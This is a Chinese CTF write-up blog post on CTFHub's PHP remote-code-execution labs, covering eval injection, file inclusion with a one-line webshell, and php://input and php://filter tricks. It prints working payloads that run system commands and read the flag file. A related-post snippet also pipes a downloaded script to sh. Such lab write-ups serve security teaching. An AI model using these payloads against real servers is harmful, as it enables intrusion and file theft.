CTFHub笔记之技能树RCE:eval执行、文件包含、远程包含、php://input、读取源代码

最新推荐文章于 2024-04-04 20:26:40 发布
最新推荐文章于 2024-04-04 20:26:40 发布
阅读量4.4k 收藏 28
点赞数 7
分类专栏: CTF RCE 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/123724483
版权
CTF 同时被 2 个专栏收录
16 篇文章 4 订阅
订阅专栏
RCE
3 篇文章 1 订阅
订阅专栏

小白一个,记录解题过程,如有错误请指正!

一、eval执行

知识点:

        eval():把字符串 code 作为PHP代码执行。函数eval()语言结构是非常危险的,因为它允许执行任意 PHP 代码。它这样用是很危险的。如果您仔细的确认过,除了使用此结构以外别无方法, 请多加注意,不要允许传入任何由用户提供的、未经完整验证过的数据 。


1.用ls查看当前目录,没有发现什么

?cmd=system("ls");

        system():执行系统命令并输出执行结果

2.查看根目录,发现了flag

?cmd=system("ls%20/");

3.读取flag_26396内容即可

?cmd=system("cat%20/flag_26396"); 

二、文件包含

1.题目给了一个shell,点击之后发现是一句话木马

考点:include

解释:假如在index.php中include了一个文件,那么不管这个文件后缀是什么 这个文件中的内容将会直接出现在index.php中。

思路:只要我们把shell.txt的一句话木马内容传到index.php,就可以用蚁剑连接。

padload:

?file=shell.txt

 2.在根目录最下面找到flag

 或者 打开终端  cat /flag

三、php://input

        进来发现又是一段源码,大概意思是必须要php://+payload,看到这会想到php://input和php://filter,不过根据题目可以知道这题要用php://input伪协议

 不过还是进入phpinfo看一下allow_url_include是否打开,发现没有问题

 1.使用burp进行改包

 2.修改payload后发送,发现什么都没有

3.去根目录看一下,发现flag

4.拿到flag

四、远程包含

发现php://input还可以使用,解题方式与上题相同。

五、读取源代码

1.进来发现题目直接给出flag的位置了,用之前的php://input伪协议burp改包发现不管用了,应该是allow_url_include:off 了(默认off,on状态php://input伪协议才可以使用)。

2.我们可以用php://filter实现对文件的访问

?file=php://filter/resource=/flag

 

3.还可以用下面的payload实现flag以base64加密形式输出:

?file=php://filter/read=convert.base64-encode/resource=/flag

 

 

参考文章:

https://blog.csdn.net/weixin_50464560/article/details/117385343

https://blog.csdn.net/m0_52432374/article/details/115186285

https://www.cnblogs.com/linuxsec/articles/12684259.html

weixin_48799157
关注
  • 7
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件包含————ctfhub远程包含
qq_45655564的博客
05-29 1821
远程文件包含漏洞 在PHP的配置文件php.ini里将allow_url_fopen和allow_url_include设置为ON,include/require等包含函数可以加载远程文件,如果远程文件没经过严格的过滤,导致了执行恶意文件的代码,这就是远程文件包含漏洞。 CTFHUB远程包含 ...
第52天:代码审计-PHP项目类RCE文件包含下载删除1
08-03
代码审计-PHP 项目类 RCE文件包含下载删#漏洞关键字:select insert update mysql_query mysqli 等文件上传:$_
CTFHub | 远程包含
尼泊罗河伯的博客
06-13 2019
远程文件包含(Remote File Inclusion,简称RFI)是一种常见的安全漏洞,它可以允许攻击者远程执行恶意代码或获取敏感信息。攻击者可以通过利用应用程序中易受攻击的包含程序来引入远程文件,这些文件通常包含恶意代码或其他危险的操作。如果应用程序没有正确处理和验证用户输入,那么攻击者就可以通过注入恶意代码来利用这个漏洞。
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境 0x00 前言 CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。 0x01 搭建环境 使用CTFhub中的环境的前提条件需要在本地搭建docker的环境。 Ubuntu安装Docker如下: 支持版本 Ubuntu Precise 12.04 (LTS) Ubuntu Trusty 14.04 (LTS) Ubuntu Wily 15.10 以上版本之后的所有版本 内核高于3.10 1.获取安装最新版本的Docker wget -qO- https://get.docker.com/ | sh 或者 apt-get update && apt-get install docker.io 2.启动Docker服务 service docker start 3.安装co
CTFHUB文件包含
2201_75447904的博客
04-04 568
但需要注意的是,由于安全原因,大多数浏览器对file://协议有一些限制,例如不允许跨域访问、限制JavaScript执行等,以防止恶意网站利用file://协议进行攻击。而include_once(),require_once()这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义,变量重新赋值等问题。: 如果GET参数'file'以"php://"开头,则直接包含用户指定的文件。
mongodb eval 执行服务器端脚本
09-10
在MongoDB的服务器端可以通过db.eval函数来执行javascript脚本,如我们可以定义一个javascript函数,然后通过db.eval在服务器端来运行!我们前面其实也接触过在服务器段运行一个预定义的javascript脚本的情况,如在$where查询,执行mapreduce任务等。
CTFHub技能书解题笔记-RCE-eval执行
qq_43006864的博客
01-27 2608
打开题目 直接就是源码。 意思是传参cmd,然后直接就执行cmd,不做任何过滤。 然后我们直接传入命令,进行测试?cmd=system("ls"); 这里直接查询了当前目录。但是没有flag,我们尝试返回上一层。 /在这里做返回上一层,可叠加使用,/../../。 看到了flag_17023。 直接查看一下,这里没做过滤,我们直接运行?cmd=system("cat /flag_17023") 就拿到了flag,这一道就是非常简答单的rce远程命令代码执行
CTFHub | eval执行
尼泊罗河伯的博客
04-19 1188
eval 函数可以将字符串作为代码执行,那么在使用 eval 函数作为获取用户输入的时候应该避免使用这类函数。如果用户输入的是一段恶意代码,就会导致严重的安全问题。
ctf web方向与php学习记录5之eval()初见
这周末在做梦的博客
08-22 2958
由于bugku的本地包含无法打开,故找了其他人解题的过程以供学习。 https://www.cnblogs.com/0yst3r-2046/p/11062755.html 在本次学习中我将我学习的相关的原理和知识分享给大家,如下。 一,初见eval,智商开始下线 eval()函数中的evalevaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行,一般情况下不建议使用容易被黑客利用。 (1)定义和用法 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是是完整,合法的PH
ctfhub--技能树rce
lulu001128的博客
02-28 653
解题思路
CTFHubRCE文件包含
m0_63563528的博客
02-03 586
文件包含漏洞的原理及利用、PHP伪协议
CTFHUB——RCEeval执行文件包含漏洞
m0_46467017的博客
08-31 4930
代码解释:本关代码和第一关文件包含一样,通过strpos函数判断参数是否存在flag字符,存在就执行include函数。因为本关没有限制php://input伪协议,所以本关解法和上一关一样,这里就不再赘述了。代码解释:本关代码和之前php://input关卡一样,通过substr函数来判断file参数是否等于php://,如果等于就执行include函数。代码解释为如果存在cmd参数,那就用eval函数执行cmd参数中的代码,所以本关存在命令执行。连接成功后,其余步骤与上一关相同。...
RCE:InterSystems Caché 的远程代码执行
06-25
InterSystems Caché 的远程代码执行。 可以在以下位置执行代码: Windows -> Windows、Linux Linux -> Linux 安装 导入并编译所有类(任何命名空间)。 (非必需)设置以下全局值: set ^settings("exec") = {path...
Umbraco-RCE:Umbraco CMS 7.12.4-(已认证)远程执行代码
03-21
Umbraco RCE漏洞利用/ PoC Umbraco CMS 7.12.4-(已认证)远程执行代码 [ ] [ ]用法$ python exploit.py -husage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]Umbraco authenticated RCEoptional ...
h264_dvr_rce:TVT DVR上的远程代码执行漏洞
05-14
h264_dvr_rce 博客文章-http:
GAE-RCE:Google App Engine-远程执行代码错误(赏金36,000美元)
05-18
Google App Engine-远程执行代码错误(赏金36,000美元): : app-托管在示例应用程序 / args-返回传递给Java启动器的所有命令行参数 / nmap-扫描169.254.169.253中的所有端口 / grpc-运行gRPC C ++客户端 gRPC_...
题解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 770
RCE漏洞,Hackbar插件的使用,cmd命令,运算符、空格、关键字flag、cat。
CTFHub_技能树_WebRCE——“eval执行”、“命令注入”
Ho1aAs‘s Blog
07-23 8732
文章目录一、eval执行二、命令注入完 –>CTFHub传送门<– 一、eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> PHP代码显示,要求将命令赋值给cmd然后执行 先查看一下根目录文件 /?cmd=system("ls"); !切记最后的分号不可省略! 没有需要的文件 看看上一级的文件夹 /
CTFHub技能书解题笔记-RCE-远程包含
qq_43006864的博客
03-29 1276
直接开题: 打开题目就是源代码。这里进行简单分析: 这里还说了。我没有shell。 源码这里使用的提到了file。 既然是远程文件包含,那我们尝试使用file包含phpinfo 看样子能行 他说没有shell,那我们利用远程文件包含漏洞结合php伪协议自己传入一个。 这里提供利用样例截图。 开始进行测试: 传入phpinfo 成功运行PHPinfo。路线是对的,那就直接命令执行了。 拿到flag,本题结束。重点...
webCTF文件包含
最新发布
04-24
WebCTF文件包含是一种常见的Web安全漏洞,也被称为文件包含漏洞。它指的是在Web应用程序中,未正确过滤用户输入导致恶意用户可以通过构造特定的请求,将本应该被限制访问的文件包含到页面中。 文件包含漏洞通常存在于动态网页中,其中包含了用户可控的参数,如URL参数、表单提交等。攻击者可以通过修改这些参数,使得应用程序将恶意文件包含到页面中,从而执行任意的代码。 攻击者利用文件包含漏洞可以实现以下攻击: 1. 读取敏感文件:攻击者可以读取服务器上的敏感文件,如配置文件、数据库凭证等。 2. 执行任意代码:攻击者可以通过包含恶意代码文件,执行任意的系统命令或者脚本。 3. 远程文件包含:攻击者可以通过包含远程服务器上的文件,实现远程代码执行。 为了防止文件包含漏洞,开发人员应该采取以下措施: 1. 输入验证和过滤:对用户输入进行严格的验证和过滤,确保只允许合法的输入。 2. 文件路径限制:限制用户输入的文件路径只能访问指定目录下的文件,避免访问敏感文件。 3. 使用白名单:限制可包含的文件列表,只允许包含指定的文件,避免包含任意文件。 4. 避免直接包含用户输入:尽量避免直接将用户输入作为文件路径进行包含,可以使用间接方式,如通过参数传递。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值